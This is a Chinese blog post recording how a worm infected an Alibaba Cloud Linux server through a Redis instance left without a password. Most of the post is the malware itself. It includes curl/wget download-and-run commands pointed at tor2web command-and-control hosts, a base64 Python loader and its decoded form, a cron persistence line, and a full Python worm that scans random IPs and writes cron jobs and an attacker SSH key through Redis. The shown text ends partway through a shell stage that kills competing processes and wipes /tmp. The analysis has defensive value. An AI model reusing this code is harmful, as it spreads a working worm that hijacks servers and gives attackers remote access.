一个阿里云 linux服务器被植入病毒的记录

update: 没想到一个我记录下的备忘会有朋友关注，那就更新一下。

1. 有人说代码显示不佳，我后来了解了下，需要新文章开始用Markdown设置，现在改不了了。

2. 文末补充了综合网上各处的清理脚本，仅供参考，实测还是有感染较深机器不能完全清除。

最近在我们的阿里云服务器(centos linux)上遇到一个病毒，是因为装个新系统，Redis没设密码，攻进来的，应该是个蠕虫代码。看了下，这shell脚本代码写的挺好的，贴在这里，学习一下。

先是阿里云报警，说在对外攻击：

尊敬的xxxx，您的云服务器（xxxx）由于被检测到对外攻击，已阻断该服务器对其它服务器端口（TCP:6379）的访问，阻断预计将在2019-05-21 19:04:50时间内结束，请及时进行安全自查。若有疑问，请工单或电话联系阿里云售后。

感谢您对阿里云的支持。

【阿里云】尊敬的 xxx：您有服务器因攻击被限制访问部分目的端口，详细信息请看https://c.tb.cn/I3.vWxO

登录进来看进程，多了几个可疑的进程：

```

curl -fsSLk --connect-timeout 26 --max-time 75 https://an7kmd2wp4xo7hpr.tor2web.su/src/ud

wget --quiet --no-check-certificate --connect-timeout=26 --timeout=175 https://an7kmd2wp4xo7hpr.onion.in.net/src/ldm -O /etc/cron.daily/cronlog

/usr/sbin/ntpd -u ntp:ntp -g

/bin/sh /root/.cache/.ntp -n

curl -fsSLk --connect-timeout 26 --max-time 175 https://an7kmd2wp4xo7hpr.tor2web.su/images/ico/r64x75.ico -o /root/.cache/.favicon.ico

python2 -c import base64;exec(base64.b64decode('I2NvZGluZzogdXRmLTgKaW1wb3J0IGJhc2U2NAppbXBvcnQgdXJsbGliMgppbXBvcnQgc3Ns

CkhPU1Q9Imh0dHBzOi8vYW43a21kMndwNHhvN2hwciIKUlBBVEgxPSJzcmMvc2MiCmQxPUhPU1QrIi50b3Iyd2ViLnN1LyIrUlBBVEgxCmQzPUhPU1QrIi5vbmlvbi5zaC8iK1JQQVRIMQpkMj1IT1NUKyIudG9yMndlYi5p

by8iK1JQQVRIMQpkZWYgbGQodXJsLCB0KToKICAgIHRyeToKICAgICAgICBjdHggPSBzc2wuY3JlYXRlX2RlZmF1bHRfY29udGV4dCgpCiAgICAgICAgY3R4LmNoZWNrX2hvc3RuYW1lID0gRmFsc2UKICAgICAgICBjdHgu

dmVyaWZ5X21vZGUgPSBzc2wuQ0VSVF9OT05FCiAgICBleGNlcHQgRXhjZXB0aW9uOgogICAgICAgIGN0eD1GYWxzZQogICAgaWYgY3R4OgogICAgICAgICAgIHBhZ2U9YmFzZTY0LmI2NGRlY29kZSh1cmxsaWIyLnVybG9w

ZW4odXJsLHRpbWVvdXQ9dCxjb250ZXh0PWN0eCkucmVhZCgpKQogICAgZWxzZToKICAgICAgICAgICBwYWdlPWJhc2U2NC5iNjRkZWNvZGUodXJsbGliMi51cmxvcGVuKHVybCx0aW1lb3V0PXQpLnJlYWQoKSkKICAgIHJl

dHVybiBwYWdlCnRyeToKICAgIHRyeToKICAgICAgICBwYWdlPWxkKGQxLCA0MSkKICAgICAgICBleGVjKHBhZ2UpCiAgICBleGNlcHQgRXhjZXB0aW9uOgogICAgICAgIHBhZ2U9bGQoZDIsIDQxKQogICAgICAgIGV4ZWMo

cGFnZSkKZXhjZXB0IEV4Y2VwdGlvbjoKICAgIHBhZ2U9bGQoZDMsIDQxKQogICAgZXhlYyhwYWdlKQogICAgcGFzcw=='))

```

上面那段解码过来代码是这个 python写的：

~~~python
```python

#coding: utf-8

import base64

import urllib2

import ssl

HOST="https://an7kmd2wp4xo7hpr"

RPATH1="src/sc"

d1=HOST+".tor2web.su/"+RPATH1

d3=HOST+".onion.sh/"+RPATH1

d2=HOST+".tor2web.io/"+RPATH1

def ld(url, t):

try:

ctx = ssl.create_default_context()

ctx.check_hostname = False

ctx.verify_mode = ssl.CERT_NONE

except Exception:

ctx=False

if ctx:

page=base64.b64decode(urllib2.urlopen(url,timeout=t,context=ctx).read())

else:

page=base64.b64decode(urllib2.urlopen(url,timeout=t).read())

return page

try:

page=ld(d1, 41)

exec(page)

except Exception:

page=ld(d2, 41)

exec(page)

except Exception:

page=ld(d3, 41)

exec(page)

pass

```
~~~

主要作用是拉远程代码，几个服务器轮流备用。

然后服务器上会多几个文件，文件位置还会变

/usr/local/bin/npt

/usr/local/bin/nptd

/usr/sbin/npt

/usr/sbin/nptd

~/.cache/npt

~/.cache/.a

~/.cache/.aYn0N29e2MItcV7Di2udY4Idnd0zOC6qsDf

kill-9 这些进程，杀死后会重启，crontab和sshkey文件即使root下也删不掉，网上查了下，

是利用了 linux文件不可变属性i标志，lsattr命令看文件和其目录的i标记，chattr清除

但清除后又会被加上。原因请看后面的代码。

在定时任务里看

crontab -l

*/17 * * * * (tbin=$(command -v passwd); bpath=$(dirname "${tbin}"); curl="curl"; if [ $(curl --version 2>/dev/null|grep "curl "|wc -l) -eq 0 ]; then curl="echo"; if [ "${bpath}" != "" ]; then for f in ${bpath}*; do strings $f 2>/dev/null|grep -q "CURLOPT_VERBOSE" && curl="$f" && break; done; fi; fi; wget="wget"; if [ $(wget --version 2>/dev/null|grep "wgetrc "|wc -l) -eq 0 ]; then wget="echo"; if [ "${bpath}" != "" ]; then for f in ${bpath}*; do strings $f 2>/dev/null|grep -q "to " && wget="$f" && break; done; fi; fi; if [ $(cat /etc/hosts|grep -i ".onion."|wc -l) -ne 0 ]; then echo "127.0.0.1 localhost" > /etc/hosts >/dev/null 2>&1; fi; ${curl} -fsSLk --connect-timeout 26 --max-time 75 https://an7kmd2wp4xo7hpr.tor2web.su/src/ldm -o /usr/local/bin/npt||${curl} -fsSLk --connect-timeout 26 --max-time 75 https://an7kmd2wp4xo7hpr.tor2web.io/src/ldm -o /usr/local/bin/npt||${curl} -fsSLk --connect-timeout 26 --max-time 75 https://an7kmd2wp4xo7hpr.onion.sh/src/ldm -o /usr/local/bin/npt||${wget} --quiet --no-check-certificate --connect-timeout=26 --timeout=75 https://an7kmd2wp4xo7hpr.tor2web.su/src/ldm -O /usr/local/bin/npt||${wget} --quiet --no-check-certificate --connect-timeout=26 --timeout=75 https://an7kmd2wp4xo7hpr.tor2web.io/src/ldm -O /usr/local/bin/npt||${wget} --quiet --no-check-certificate --connect-timeout=26 --timeout=75 https://an7kmd2wp4xo7hpr.onion.sh/src/ldm -O /usr/local/bin/npt) && chmod +x /usr/local/bin/npt && /bin/sh /usr/local/bin/npt

格式化下：

```

(tbin=$(command -v passwd);

bpath=$(dirname "${tbin}");

curl="curl";

if [ $(curl --version 2>/dev/null|grep "curl "|wc -l) -eq 0 ];

then

curl="echo";

if [ "${bpath}" != "" ];

then

for f in ${bpath}*;

do strings $f 2>/dev/null|grep -q "CURLOPT_VERBOSE" && curl="$f" && break;

done;

fi;

wget="wget";

if [ $(wget --version 2>/dev/null|grep "wgetrc "|wc -l) -eq 0 ];

then

wget="echo";

if [ "${bpath}" != "" ];

then

for f in ${bpath}*;

do strings $f 2>/dev/null|grep -q "to " && wget="$f" && break;

done;

fi;

if [ $(cat /etc/hosts|grep -i ".onion."|wc -l) -ne 0 ];

then

echo "127.0.0.1 localhost" > /etc/hosts >/dev/null 2>&1;

fi;

${curl} -fsSLk --connect-timeout 26 --max-time 75 https://an7kmd2wp4xo7hpr.tor2web.su/src/ldm -o /usr/local/bin/npt

||${curl} -fsSLk --connect-timeout 26 --max-time 75 https://an7kmd2wp4xo7hpr.tor2web.io/src/ldm -o /usr/local/bin/npt

||${curl} -fsSLk --connect-timeout 26 --max-time 75 https://an7kmd2wp4xo7hpr.onion.sh/src/ldm -o /usr/local/bin/npt

||${wget} --quiet --no-check-certificate --connect-timeout=26 --timeout=75 https://an7kmd2wp4xo7hpr.tor2web.su/src/ldm -O /usr/local/bin/npt

||${wget} --quiet --no-check-certificate --connect-timeout=26 --timeout=75 https://an7kmd2wp4xo7hpr.tor2web.io/src/ldm -O /usr/local/bin/npt

||${wget} --quiet --no-check-certificate --connect-timeout=26 --timeout=75 https://an7kmd2wp4xo7hpr.onion.sh/src/ldm -O /usr/local/bin/npt)

&& chmod +x /usr/local/bin/npt && /bin/sh /usr/local/bin/npt

```

#! /usr/bin/env python

#coding: utf-8

import threading

import socket

from re import findall

import httplib

import os

from random import randrange

import random

import string

IP_LIST = []

debug=0

class scanner(threading.Thread):

tlist = []

maxthreads = 100

evnt = threading.Event()

lck = threading.Lock()

def __init__(self,host):

threading.Thread.__init__(self)

self.host = host

def run(self):

RHOST='https://an7kmd2wp4xo7hpr'

TOR1='.tor2web.su/'

TOR3='.onion.sh/'

TOR2='.tor2web.io/'

CHKCURL='tbin=$(command -v passwd); bpath=$(dirname \\"${tbin}\\"); curl=\\"curl\\"; if [ $(curl --version 2>/dev/null|grep \\"curl \\"|wc -l) -eq 0 ]; then curl=\\"echo\\"; if [ \\"${bpath}\\" != \\"\\" ]; then for f in ${bpath}*; do strings $f 2>/dev/null|grep -q \\"CURLOPT_VERBOSE\\" && curl=\\"$f\\" && break; done; fi; fi; wget=\\"wget\\"; if [ $(wget --version 2>/dev/null|grep \\"wgetrc \\"|wc -l) -eq 0 ]; then wget=\\"echo\\"; if [ \\"${bpath}\\" != \\"\\" ]; then for f in ${bpath}*; do strings $f 2>/dev/null|grep -q \\"to \\" && wget=\\"$f\\" && break; done; fi; fi; if [ $(cat /etc/hosts|grep -i \\".onion.\\"|wc -l) -ne 0 ]; then echo \\"127.0.0.1 localhost\\" > /etc/hosts >/dev/null 2>&1; fi; '

RPATH1='src/ldm'

TIMEOUT='40'

COPTS='-fsSLk --max-time '+TIMEOUT

WOPTS='--quiet --no-check-certificate --timeout='+TIMEOUT

C1='\\n\\n*/1 * * * * root ('+CHKCURL+' ${curl} '+COPTS+' '+RHOST+TOR1+RPATH1+' -o ~/.ntp||${curl} '+COPTS+' '+RHOST+TOR2+RPATH1+' -o ~/.ntp||${curl} '+COPTS+' '+RHOST+TOR3+RPATH1+' -o ~/.ntp||wget '+WOPTS+' '+RHOST+TOR1+RPATH1+' -O ~/.ntp||wget '+WOPTS+' '+RHOST+TOR2+RPATH1+' -O ~/.ntp||wget '+WOPTS+' '+RHOST+TOR3+RPATH1+' -O ~/.ntp) && chmod +x ~/.ntp && sh ~/.ntp\\n\\n'

C2='\\n\\n*/1 * * * * ('+CHKCURL+' ${curl} '+COPTS+' '+RHOST+TOR1+RPATH1+' -o ~/.ntp||${curl} '+COPTS+' '+RHOST+TOR2+RPATH1+' -o ~/.ntp||${curl} '+COPTS+' '+RHOST+TOR3+RPATH1+' -o ~/.ntp||wget '+WOPTS+' '+RHOST+TOR1+RPATH1+' -O ~/.ntp||wget '+WOPTS+' '+RHOST+TOR2+RPATH1+' -O ~/.ntp||wget '+WOPTS+' '+RHOST+TOR3+RPATH1+' -O ~/.ntp) && chmod +x ~/.ntp && sh ~/.ntp\\n\\n'

SKEY="\\nssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQC1Sdr0tIIL8yPhKTLzVMnRKj1zzGqtR4tKpM2bfBEx+AHyvBL8jDZDJ6fuVwEB+aZ8bl/pA5qhFWRRWhONLnLN9RWFx/880msXITwOXjCT3Qa6VpAFPPMazJpbppIg+LTkbOEjdDHvdZ8RhEt7tTXc2DoTDcs73EeepZbJmDFP8TCY7hwgLi0XcG8YHkDFoKFUhvSHPkzAsQd9hyOWaI1taLX2VZHAk8rOaYqaRG3URWH3hZvk8Hcgggm2q/IQQa9VLlX4cSM4SifM/ZNbLYAJhH1x3ZgscliZVmjB55wZWRL5oOZztOKJT2oczUuhDHM1qoUJjnxopqtZ5DrA76WH user@localhost\\n#"

try:

s2 = socket.socket(socket.AF_INET, socket.SOCK_STREAM)

s2.settimeout(3)

x = s2.connect_ex((self.host, 6379))

if x == 0:

DFDIR=DFRDB='N/A'

stt1=stt2=stt3=stt4=stt5=-9

tmp=rd(s2, 'config get dir\r\n')

if "Authentication required" in str(tmp): stt1=-10

elif "-ERR unknown command" not in str(tmp):

if 'dir' in str(tmp): DFDIR=(tmp.split('dir'))[1].splitlines()[2]

tmp=rd(s2, 'config get dbfilename\r\n')

if 'dbfilename' in str(tmp): DFRDB=(tmp.split('dbfilename'))[1].splitlines()[2]

rs=rd(s2, 'config set dbfilename root\r\n')

if "+OK" in str(rs):

rs=rd(s2, 'config set rdbcompression no\r\n')

if "+OK" in str(rs):

write=rd(s2, 'flushall\r\n')

if "write against a read only" in str(write):

rd(s2, 'SLAVEOF NO ONE\r\n')

write=rd(s2, 'flushall\r\n')

if "write against a read only" not in str(write):

K1=''.join(random.choice(string.lowercase) for x in range(random.randint(4, 10)))

K2=''.join(random.choice(string.lowercase) for x in range(random.randint(4, 10)))

K3=''.join(random.choice(string.lowercase) for x in range(random.randint(4, 10)))

CF=''.join(random.choice(string.lowercase) for x in range(random.randint(6, 18)))

rs=rd(s2, 'config set stop-writes-on-bgsave-error no\r\n')

#rs=rd(s2, 'set '+K1+' "'+C1+'"\r\n')

rs=rd(s2, 'set '+K2+' "'+C2+'"\r\n')

apt=chkdir(s2, '/usr/share/bug/apt/')

if apt == -4:

fml='N.'

stt1=chkdir(s2, '/var/spool/cron')

else:

fml='Debian.'

stt1=chkdir(s2, '/var/spool/cron/crontabs')

pine=chkdir(s2, '/etc/crontabs')

rs=rd(s2, 'del '+K2+'\r\n')

rs=rd(s2, 'set '+K1+' "'+C1+'"\r\n')

rs=rd(s2, 'config set dbfilename .'+CF+'\r\n')

stt2=chkdir(s2, '/etc/cron.d')

rs=rd(s2, 'config set dbfilename crontab\r\n')

stt22=chkdir(s2, '/etc')

if stt2 < 2: stt2=stt22

rs=rd(s2, 'del '+K1+'\r\n')

rs=rd(s2, 'config set dbfilename authorized_keys\r\n')

rs=rd(s2, 'set '+K3+' "'+SKEY+'"\r\n')

stt3=chkdir(s2, '/root/.ssh')

stt4=chkdir(s2, '/home/ubuntu/.ssh')

#time.sleep(1)

rs=rd(s2, 'del '+K3+'\r\n')

rs=rd(s2, 'config set rdbcompression yes\r\n')

rs=rd(s2, 'config set stop-writes-on-bgsave-error yes\r\n')

if "cron" not in str(DFDIR) and ".ssh" not in str(DFDIR):

rs=rd(s2, 'config set dir '+DFDIR+'\r\n')

rs=rd(s2, 'config set dbfilename '+DFRDB+'\r\n')

else:

rs=rd(s2, 'config set dir /var/lib/redis\r\n')

rs=rd(s2, 'config set dbfilename dump.rdb\r\n')

s2.close()

except Exception:

pass

scanner.lck.acquire()

scanner.tlist.remove(self)

if len(scanner.tlist) < scanner.maxthreads:

scanner.evnt.set()

scanner.evnt.clear()

scanner.lck.release()

def newthread(host):

scanner.lck.acquire()

sc = scanner(host)

scanner.tlist.append(sc)

scanner.lck.release()

sc.start()

newthread = staticmethod(newthread)

def get_ip_list():

try:

url = 'ifconfig.co/ip'

conn = httplib.HTTPConnection(url, port=80, timeout=10)

conn.request(method='GET', url='/', )

result = conn.getresponse()

ip1 = result.read()

ips1 = findall(r'\d+.\d+.', ip1)[0]

for u in range(0, 256):

ip_list1 = (ips1 + (str(u)))

for g in range(1, 256):

IP_LIST.append(ip_list1 + '.' + (str(g)))

except Exception:

ip2 = os.popen("/sbin/ifconfig -a|grep inet|grep -v 127.0.0.1|grep -v inet6|awk '{print $2}'|tr -d \"addr:\"").readline().rstrip()

ips2 = findall(r'\d+.\d+.', ip2)[0]

for i in range(0, 255):

ip_list2 = (ips2 + (str(i)))

for g in range(1, 255):

IP_LIST.append(ip_list2 + '.' + (str(g)))

pass

def get_ip_list2():

not_valid = [10,127,169,172,192]

for i in range(0, 100000):

first = randrange(1,227)

while first in not_valid:

first = randrange(1,227)

ip = ".".join([str(first),str(randrange(0,256)),

str(randrange(0,256)),str(randrange(0,256))])

IP_LIST.append(ip)

def runPortscan():

for x in range(99999):

get_ip_list2()

for host in IP_LIST:

scanner.lck.acquire()

if len(scanner.tlist) >= scanner.maxthreads:

scanner.lck.release()

scanner.evnt.wait()

else:

scanner.lck.release()

scanner.newthread(host)

for t in scanner.tlist:

t.join()

def rd(sock, packet):

try:

sock.send(packet)

reply = sock.recv(1024)

if not reply: pass

if '*' not in reply and '$' not in reply and '+' not in reply and ':' not in reply and debug >= 2: print(reply)

return reply

except:

pass

def chkdir(sock, dir):

stt=0

rs=rd(sock, 'config set dir '+dir+'\r\n')

if "+OK" in str(rs):

stt=1

rs=rd(sock, 'save\r\n')

if "+OK" in str(rs):

stt=2

elif "o such file or " in str(rs): stt=-4

return stt

if __name__ == "__main__":

try:

runPortscan()

except KeyboardInterrupt:

try:

exit(0)

except SystemExit:

os._exit(0)

```

从里面看到有拉其远端代码，

https://an7kmd2wp4xo7hpr.onion.in.net/src/ldm

base64解码后代码这样：

```

#!/bin/sh

SHELL=/bin/sh

PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin

RHOST="https://an7kmd2wp4xo7hpr"

TOR1=".tor2web.su/"

TOR2=".tor2web.io/"

TOR3=".onion.sh/"

RPATH1='src/ldm'

#LPATH="${HOME-/tmp}/.cache/"

TIMEOUT="75"

CTIMEOUT="22"

COPTS=" -fsSLk --retry 2 --connect-timeout ${CTIMEOUT} --max-time ${TIMEOUT} "

WOPTS=" --quiet --tries=2 --wait=5 --no-check-certificate --connect-timeout=${CTIMEOUT} --timeout=${TIMEOUT} "

tbin=$(command -v passwd); bpath=$(dirname "${tbin}")

curl="curl"; if [ $(curl --version 2>/dev/null|grep "curl "|wc -l) -eq 0 ]; then curl="echo"; if [ "${bpath}" != "" ]; then for f in ${bpath}*; do strings $f 2>/dev/null|grep -q "CURLOPT_VERBOSE" && curl="$f" && break; done; fi; fi

wget="wget"; if [ $(wget --version 2>/dev/null|grep "wgetrc "|wc -l) -eq 0 ]; then wget="echo"; if [ "${bpath}" != "" ]; then for f in ${bpath}*; do strings $f 2>/dev/null|grep -q ".wgetrc'-style command" && wget="$f" && break; done; fi; fi

#CHKCURL='curl="curl "; wget="wget "; if [ "$(whoami)" = "root" ]; then if [ $(command -v curl|wc -l) -eq 0 ]; then curl=$(ls /usr/bin|grep -i url|head -n 1); fi; if [ -z ${curl} ]; then curl="echo "; fi; if [ $(command -v wget|wc -l) -eq 0 ]; then wget=$(ls /usr/bin|grep -i wget|head -n 1); fi; if [ -z ${wget} ]; then wget="echo "; fi; if [ $(cat /etc/hosts|grep -i ".onion."|wc -l) -ne 0 ]; then echo "127.0.0.1 localhost" > /etc/hosts >/dev/null 2>&1; fi; fi; '

CHKCURL='tbin=$(command -v passwd); bpath=$(dirname "${tbin}"); curl="curl"; if [ $(curl --version 2>/dev/null|grep "curl "|wc -l) -eq 0 ]; then curl="echo"; if [ "${bpath}" != "" ]; then for f in ${bpath}*; do strings $f 2>/dev/null|grep -q "CURLOPT_VERBOSE" && curl="$f" && break; done; fi; fi; wget="wget"; if [ $(wget --version 2>/dev/null|grep "wgetrc "|wc -l) -eq 0 ]; then wget="echo"; if [ "${bpath}" != "" ]; then for f in ${bpath}*; do strings $f 2>/dev/null|grep -q "to " && wget="$f" && break; done; fi; fi; if [ $(cat /etc/hosts|grep -i ".onion."|wc -l) -ne 0 ]; then echo "127.0.0.1 localhost" > /etc/hosts >/dev/null 2>&1; fi; '

LBIN8="kthrotlds"

null=' >/dev/null 2>&1'

sudoer=1

sudo=''

if [ "$(whoami)" != "root" ]; then

sudo="sudo "

timeout 1 sudo -v >/dev/null 2>&1 && sudoer=1||{ sudo=''; sudoer=0; }

if [ $(command -v nohup|wc -l) -ne 0 ] && [ "$1" != "-n" ]; then

${sudo} chmod +x "$0"

nohup ${sudo} "$0" -n >/dev/null 2>&1 &

echo 'Sent!'

exit $?

rand=$(head /dev/urandom | tr -dc A-Za-z0-9 | head -c $(shuf -i 4-16 -n 1) ; echo ''); if [ -z ${rand} ]; then rand='.tmp'; fi

touch "/tmp/.${rand}" >/dev/null 2>&1 && LPATH="/tmp/.cache/"; rm -f "/tmp/.${rand}" >/dev/null 2>&1

touch "/usr/local/bin/.${rand}" >/dev/null 2>&1 && LPATH="/usr/local/bin/.cache/"; rm -f "/usr/local/bin/.${rand}" >/dev/null 2>&1

touch "${HOME}/.${rand}" >/dev/null 2>&1 && LPATH="${HOME}/.cache/"; rm -f "${HOME}/.${rand}" >/dev/null 2>&1

mkdir -p ${LPATH} >/dev/null 2>&1

${sudo} chattr -i ${LPATH} >/dev/null 2>&1; chmod 755 ${LPATH} >/dev/null 2>&1; ${sudo} chattr +a ${LPATH} >/dev/null 2>&1

C1="*/9 * * * * (${CHKCURL} "'${curl}'" ${COPTS} ${RHOST}${TOR1}${RPATH1} -o ${LPATH}.ntp||"'${curl}'" ${COPTS} ${RHOST}${TOR2}${RPATH1} -o ${LPATH}.ntp||"'${curl}'" ${COPTS} ${RHOST}${TOR3}${RPATH1} -o ${LPATH}.ntp||"'${wget}'" ${WOPTS} ${RHOST}${TOR1}${RPATH1} -O ${LPATH}.ntp||"'${wget}'" ${WOPTS} ${RHOST}${TOR2}${RPATH1} -O ${LPATH}.ntp||"'${wget}'" ${WOPTS} ${RHOST}${TOR3}${RPATH1} -O ${LPATH}.ntp) && chmod +x ${LPATH}.ntp && $(command -v sh) ${LPATH}.ntp"

C2="*/11 * * * * root (${CHKCURL} "'${curl}'" ${COPTS} ${RHOST}${TOR1}${RPATH1} -o ${LPATH}.ntp||"'${curl}'" ${COPTS} ${RHOST}${TOR2}${RPATH1} -o ${LPATH}.ntp||"'${curl}'" ${COPTS} ${RHOST}${TOR3}${RPATH1} -o ${LPATH}.ntp||"'${wget}'" ${WOPTS} ${RHOST}${TOR1}${RPATH1} -O ${LPATH}.ntp||"'${wget}'" ${WOPTS} ${RHOST}${TOR2}${RPATH1} -O ${LPATH}.ntp||"'${wget}'" ${WOPTS} ${RHOST}${TOR3}${RPATH1} -O ${LPATH}.ntp) && chmod +x ${LPATH}.ntp && $(command -v sh) ${LPATH}.ntp"

skey="ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQC1Sdr0tIIL8yPhKTLzVMnRKj1zzGqtR4tKpM2bfBEx+AHyvBL8jDZDJ6fuVwEB+aZ8bl/pA5qhFWRRWhONLnLN9RWFx/880msXITwOXjCT3Qa6VpAFPPMazJpbppIg+LTkbOEjdDHvdZ8RhEt7tTXc2DoTDcs73EeepZbJmDFP8TCY7hwgLi0XcG8YHkDFoKFUhvSHPkzAsQd9hyOWaI1taLX2VZHAk8rOaYqaRG3URWH3hZvk8Hcgggm2q/IQQa9VLlX4cSM4SifM/ZNbLYAJhH1x3ZgscliZVmjB55wZWRL5oOZztOKJT2oczUuhDHM1qoUJjnxopqtZ5DrA76WH user@localhost"

if [ "$(whoami)" != "root" ]; then sshdir="/${HOME}/.ssh"; else sshdir='/root/.ssh'; fi

${sudo} rm -f /tmp/* >/dev/null 2>&1

${sudo} rm -f /tmp/.* >/dev/null 2>&1

${sudo} ps ax|grep -v grep|grep -v defunct|grep -v "${LBIN8}"|grep -v ".ntp"|grep -i "nicehash\|linuxs\|linuxl\|Linux\|crawler.weibo\|44444\|cryptonight\|stratum\|gpg-daemon\|jobs.flu.cc\|nmap\|cranberry\|start.sh\|watch.sh\|krun.sh\|killTop.sh\|cpuminer\|/60009\|ssh_deny.sh\|clean.sh\|\./over\|mrx1\|redisscan\|ebscan\|redis-cli\|barad_agent\|\.sr0\|clay\|udevs\|\.sshd\|/tmp/init"|uniq| while read pid _; do if [ ${pid} -gt 301 ] && [ "$pid" != "$$" ]; then ${sudo} kill -9 "${pid}" >/dev/null 2>&1; ${sudo} kill -TERM -"${pid}" >/dev/null 2>&1; fi; done

${sudo} ps ax|grep -v grep|grep -v defunct|grep -v "bash"|grep -v "ssh"|grep -v ".ntp"|grep -i " sh\|kworkerds\|56416\|xmr\|xig\|ddgs\|minerd\|hashvault\|geqn\|.kthreadd\|httpdz\|kworker\|config.json\|gwjyhs.com\|pastebin.com\|sobot.com\|kerbero"|uniq| while read pid _; do if [ ${pid} -gt 301 ] && [ "$pid" != "$$" ]; then ${sudo} kill -9 "${pid}" >/dev/null 2>&1; ${sudo} kill -TERM -"${pid}" >/dev/null 2>&1; fi; done

hload=$(${sudo} ps aux|grep -v grep|grep -v defunct|grep -v "${LBIN8}"|grep -vi 'java '|grep -vi 'jenkins'|awk '{if($3>=54.0) print $11}'|head -n 1)

[ "${hload}" != "" ] && { ${sudo} ps ax|grep -v grep|grep -v defunct|grep -v "${LBIN8}"|grep "xmr\|${hload}"|while read pid _; do if [ ${pid} -gt 301 ] && [ "$pid" != "$$" ]; then ${sudo} kill -9 "${pid}" >/dev/null 2>&1; fi; done; }

#${sudo} pkill sleep >/dev/null 2>&1

#loop=$(ps -eo ppid,comm|grep -v grep|grep -i ' sleep'|awk '{print $1}'|uniq)

#if [ "${loop}" != "" ]; then for p in ${loop}; do if [ $p -gt 301 ] && [ $p -ne $$ ] && [ $p -ne $PPID ]; then $sudo kill -9 $p; $sudo pkill -P $p; fi; done; fi

hload2=$(${sudo} ps aux|grep -v grep|grep -v defunct|grep -v python|grep -v "${LBIN8}"|awk '{if($3>=0.0) print $2}'|uniq)

if [ "${hload2}" != "" ]; then

for p in ${hload2}; do

xm=''

if [ $p -gt 301 ]; then

if [ -f /proc/${p}/exe ]; then

xmf="$(readlink /proc/${p}/cwd 2>/dev/null)/$(cat /proc/${p}/comm 2>/dev/null)"

xm=$(grep -i "xmr\|cryptonight\|hashrate" /proc/${p}/exe 2>/dev/null)

elif [ -f /proc/${p}/comm ]; then

xmf="$(readlink /proc/${p}/cwd 2>/dev/null)/$(cat /proc/${p}/comm 2>/dev/null)"

xm=$(grep -i "xmr\|cryptonight\|hashrate" ${xmf} 2>/dev/null)

if [ -n "${xm}" ]; then ${sudo} kill -9 ${p} >/dev/null 2>&1; ${sudo} chattr -i -a "${xmf}" >/dev/null 2>&1; ${sudo} rm -rf "${xmf}" >/dev/null 2>&1; fi

done

others=$(${sudo} ps aux|grep -v grep|grep -v defunct|grep -v "${LBIN8}"|awk '{if($3>=0.0) print $11}')

if [ "${others}" != "" ]; then

for o in ${others}; do

okill=0

if [ -f "${o}" ]; then

if grep -qi 'ddgs' "${o}" 2>/dev/null && grep -qi 'slave' "${o}" 2>/dev/null; then okill=1; fi

if grep -qi 'kerberods' "${o}" 2>/dev/null || grep -qi 'khugepageds' "${o}" 2>/dev/null; then okill=1; fi

if [ ${okill} -eq 1 ]; then

${sudo} ps ax|grep -v grep|grep -v defunct|grep "${o}"|while read pid _; do ${sudo} kill -9 "$pid" >/dev/null 2>&1; done

${sudo} chattr -i -a "${o}" >/dev/null 2>&1; rm -rf "${o}" >/dev/null 2>&1

done

net=$(${curl} -fsSLk --max-time 6 ipinfo.io/ip)

if echo "${net}"|grep -q 'Could not resolve proxy'; then

unset http_proxy; unset HTTP_PROXY; unset https_proxy; unset HTTPS_PROXY

http_proxy=""; HTTP_PROXY=""; https_proxy=""; HTTPS_PROXY=""

if [ ${sudoer} -eq 1 ]; then

if [ -f /etc/ld.so.preload ]; then

if [ $(which chattr|wc -l) -ne 0 ]; then ${sudo} chattr -i /etc/ld.so.preload >/dev/null 2>&1; fi

${sudo} ln -sf /etc/ld.so.preload /tmp/.ld.so >/dev/null 2>&1

>/tmp/.ld.so >/dev/null 2>&1

${sudo} rm -rf /etc/ld.so.preload* >/dev/null 2>&1

#${sudo} find / -name ld.so.preload* -exec ${sudo} rm -rf {} \;

if [ -d /etc/systemd/system/ ]; then ${sudo} rm -rf /etc/systemd/system/cloud* >/dev/null 2>&1; fi

[ $(${sudo} cat /etc/hosts|grep -i ".onion."|wc -l) -ne 0 ] && { ${sudo} chattr -i -a /etc/hosts >/dev/null 2>&1; ${sudo} chmod 644 /etc/hosts >/dev/null 2>&1; ${sudo} sed -i '/.onion.$/d' /etc/hosts >/dev/null 2>&1; }

[ $(${sudo} cat /etc/hosts|grep -i "busybox"|wc -l) -ne 0 ] && { ${sudo} chattr -i -a /etc/hosts >/dev/null 2>&1; ${sudo} chmod 644 /etc/hosts >/dev/null 2>&1; ${sudo} sed -i '/busybox$/d' /etc/hosts >/dev/null 2>&1; }

[ $(${sudo} cat /etc/hosts|grep -i ".onion."|wc -l) -ne 0 ] && { ${sudo} echo '127.0.0.1 localhost' > /etc/hosts >/dev/null 2>&1; }

if [ -f /usr/bin/yum ]; then

if [ -f /usr/bin/systemctl ]; then

crstart="systemctl restart crond.service >/dev/null 2>&1"

crstop="systemctl stop crond.service >/dev/null 2>&1"

else

crstart="/etc/init.d/crond restart >/dev/null 2>&1"

crstop="/etc/init.d/crond stop >/dev/null 2>&1"

elif [ -f /usr/bin/apt-get ]; then

crstart="service cron restart >/dev/null 2>&1"

crstop="service cron stop >/dev/null 2>&1"

elif [ -f /usr/bin/pacman ]; then

crstart="/etc/rc.d/cronie restart >/dev/null 2>&1"

crstop="/etc/rc.d/cronie stop >/dev/null 2>&1"

elif [ -f /sbin/apk ]; then

crstart="/etc/init.d/crond restart >/dev/null 2>&1"

crstop="/etc/init.d/crond stop >/dev/null 2>&1"

if [ ! -f "${LPATH}.sysud" ] || [ $(bash --version 2>/dev/null|wc -l) -eq 0 ] || [ $(wget --version 2>/dev/null|wc -l) -eq 0 ]; then

if [ -f /usr/bin/yum ]; then

yum install -y -q -e 0 openssh-server iptables bash curl wget zip unzip python2 net-tools e2fsprogs vixie-cron cronie >/dev/null 2>&1

yum reinstall -y -q -e 0 curl wget unzip bash net-tools vixie-cron cronie >/dev/null 2>&1

chkconfig sshd on >/dev/null 2>&1

chkconfig crond on >/dev/null 2>&1;

if [ -f /usr/bin/systemctl ]; then

systemctl start sshd.service >/dev/null 2>&1

else

/etc/init.d/sshd start >/dev/null 2>&1

elif [ -f /usr/bin/apt-get ]; then

rs=$(yes | ${sudo} apt-get update >/dev/null 2>&1)

